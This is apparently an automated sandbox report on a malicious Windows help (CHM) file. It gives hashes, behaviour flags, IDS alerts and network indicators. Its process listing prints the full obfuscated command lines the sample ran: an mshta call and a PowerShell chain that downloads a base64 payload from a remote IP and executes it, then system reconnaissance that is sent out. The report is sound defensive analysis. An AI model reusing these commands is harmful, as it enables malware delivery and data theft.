analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

file.chm

Full analysis: https://app.any.run/tasks/38df55e9-745f-46a7-8328-4b352849531c
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 14:01:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

38303299C65EF84DFF0E4212FD5BB3BF

SHA1:

2250174B8998A787332C198FC94DB4615504D771

SHA256:

1135813663BF9C747A1CCA7312AEF97D345D231DF5CDEB314CB8606017D26D86

SSDEEP:

96:Tyv4wUFBoX6zsTbn5S2541qzE2uTagfVLEwi8n5VN:TywNJs/Xm4E2EldF7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cmd.exe (PID: 3492)
      • cmd.exe (PID: 3004)
      • pripriff.com (PID: 3952)
      • priprif.com (PID: 2620)
      • pripriff.com (PID: 292)
      • pripri.com (PID: 4032)
      • cmd.exe (PID: 1816)
      • cmd.exe (PID: 3668)
      • cmd.exe (PID: 4028)
      • cmd.exe (PID: 3168)

    • Changes the autorun value in the registry

      • pripri.com (PID: 4032)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3516)
      • hh.exe (PID: 2948)
      • pripri.com (PID: 4032)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3004)

    • Reads internet explorer settings

      • hh.exe (PID: 2948)

    • Starts application with an unusual extension

      • cmd.exe (PID: 3492)
      • pripriff.com (PID: 292)
      • priprif.com (PID: 2620)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3492)
      • priprif.com (PID: 2620)
      • pripri.com (PID: 4032)

    • Creates files in the user directory

      • pripri.com (PID: 4032)

    • Creates files in the program directory

      • cmd.exe (PID: 3668)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3668)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 1816)

    • Connects to server without host name

      • pripri.com (PID: 4032)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 4028)

    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 3168)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

CHMVersion: 3
LanguageCode: English (U.S.)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
16
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start hh.exe no specs cmd.exe no specs mshta.exe cmd.exe pripriff.com no specs pripriff.com no specs priprif.com pripri.com cmd.exe no specs systeminfo.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\file.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3004"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3516mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3492"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\pripriff.com && C:\Users\admin\AppData\Local\Temp\\pripriff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\priprif.com& C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\\priprif.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3952C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\pripriff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
292C:\Users\admin\AppData\Local\Temp\\pripriff.com /c C:\Users\admin\AppData\Local\Temp\\priprif.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Users\admin\AppData\Local\Temp\pripriff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2620C:\Users\admin\AppData\Local\Temp\\priprif.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\pripri.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\pripri.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\pripri.com $sv; C:\Users\admin\AppData\Local\Temp\\pripri.com;C:\Users\admin\AppData\Local\Temp\priprif.com
pripriff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4032"C:\Users\admin\AppData\Local\Temp\pripri.com"C:\Users\admin\AppData\Local\Temp\pripri.com
priprif.com
User:
admin
Company:
MS DefenderApplication
Integrity Level:
MEDIUM
Description:
MS DefenderApplicationController
Version:
2.0.4.9
3668"C:\Windows\System32\cmd.exe" /C systeminfo >> C:\ProgramData\INFOCONTENT.TXTC:\Windows\System32\cmd.exepripri.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1208systeminfo C:\Windows\system32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
598
Read events
500
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
2620priprif.comC:\Users\admin\AppData\Local\Temp\pripri.comexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
4032pripri.comC:\Users\admin\AppData\Roaming\conhost.exe 1C9B74E8.exeexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
1816cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:E032EFB9B7E7087BB63F8221EFE8763D
SHA256:8B4715236EC109D1A8A48428B07DB20D6D8209ABA5EF628DFAA77551ADCFAB4A
3668cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:CC1359FB3B493A168E35CFD77674E3F2
SHA256:2253C28AAD3F1845C99106963162A72425D3CC941CD0899A65F0ED73CD8845F0
4028cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:CB180BCC72E9C2383A5470ECDE5762D7
SHA256:BB27252DC94DED086F2C2373708BF0BBA31BEDA0801FF63A95AE6C5C45C375DB
2620priprif.comC:\Users\admin\AppData\Local\Temp\pripri.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
3516mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
3168cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:9920BC9EF548156FE2CF4A588FB14D0D
SHA256:B7A7319D68651F8897DB41FC87F62C8695CC81616743F1EDAA3DF27C14226F7C
3492cmd.exeC:\Users\admin\AppData\Local\Temp\priprif.comexecutable
MD5:92F44E405DB16AC55D97E3BFE3B132FA
SHA256:6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
3492cmd.exeC:\Users\admin\AppData\Local\Temp\pripriff.comexecutable
MD5:AD7B9C14083B52BC532FBA5948342B98
SHA256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2620
priprif.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
4032
pripri.com
POST
200
146.0.72.188:80
http://146.0.72.188/ipv6/mod/checker_info.php
NL
text
65 b
malicious
3516
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
4032
pripri.com
GET
200
146.0.72.188:80
http://146.0.72.188/ipv6/ipvcheck.php?dns=c4ba3647
NL
text
5 b
malicious
4032
pripri.com
GET
200
146.0.72.188:80
http://146.0.72.188/ipv6/ipvcheck.php?dns=c4ba3647
NL
text
5 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3516
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious
4032
pripri.com
146.0.72.188:80
Hostkey B.v.
NL
malicious
2620
priprif.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2620
priprif.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2620
priprif.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2620
priprif.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
4032
pripri.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
4032
pripri.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
4032
pripri.com
Potentially Bad Traffic
GPL ATTACK_RESPONSE command completed
4032
pripri.com
A Network Trojan was detected
ET TROJAN TrueBot/Silence.Downloader Keep-Alive
4032
pripri.com
Misc activity
SUSPICIOUS [PTsecurity] Possible TrojanDownloader
4032
pripri.com
A Network Trojan was detected
ET TROJAN TrueBot/Silence.Downloader Keep-Alive
4032
pripri.com
Misc activity
SUSPICIOUS [PTsecurity] Possible TrojanDownloader
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
file.chm